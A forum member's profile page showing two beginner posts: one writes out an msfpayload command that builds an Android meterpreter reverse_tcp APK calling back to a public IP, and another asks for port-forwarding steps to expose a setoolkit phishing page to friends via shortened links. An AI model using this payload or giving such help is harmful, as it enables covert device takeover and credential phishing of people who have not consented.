Jump to content

HaKDMoDz

Members
  • Posts

    2
  • Joined

  • Last visited

Everything posted by HaKDMoDz

  1. hi when i try run this in a command terminal on my vmware kali box i get some message about using msfvenom can someone please turn my code into msfvenom code or whatever i need to make this work for android and armitage. thanks msfpayload android/meterpreter/reverse_tcp LHOST=147.69.30.122 LPORT=8080 R > nsf-2.apk
  2. HaKDMoDz

    Setoolkit

    Hi hackers, could you please help a noob, I only want to use the setoolkit for external networks so i can link my mates with a link that setoolkit creates but I can only access it on my local network. Im a cert3 I.T student and need expert advice please tell me in detail what the steps are precisely to forward my port from my routers external public address which is classA i live in Australia where we use BIGPOND as our ISP and a Technicolor t587nv3 modem/router i read on this forum that i need to do some port forwarding and use something called no-ip + kali forwarding, but its very vague and i got no actual instructions steps that I can follow, but i checked it out and fiddled and couldnt figure it out so I undid the forwarding and undid the no-ip stuff could you please help me out with this guys I'm desperate to get it working so i can prank my mates so i can give em a proper external ip address shortened by goo.gle and have them forwarded to my kali virtual box thats running setoolkit im sure someone know the steps and has been in my situation. modem/router = Thompson Technicolor T587nV3 ISP = Telstra BigPond and uses a ClassA network structured by NAT(?) VirtualBox Ver = 4.3.12 r93733 Host OS = Windows 7 (x64) Guest OS = Kali 1.09 Linux 3.14.5
×
×
  • Create New...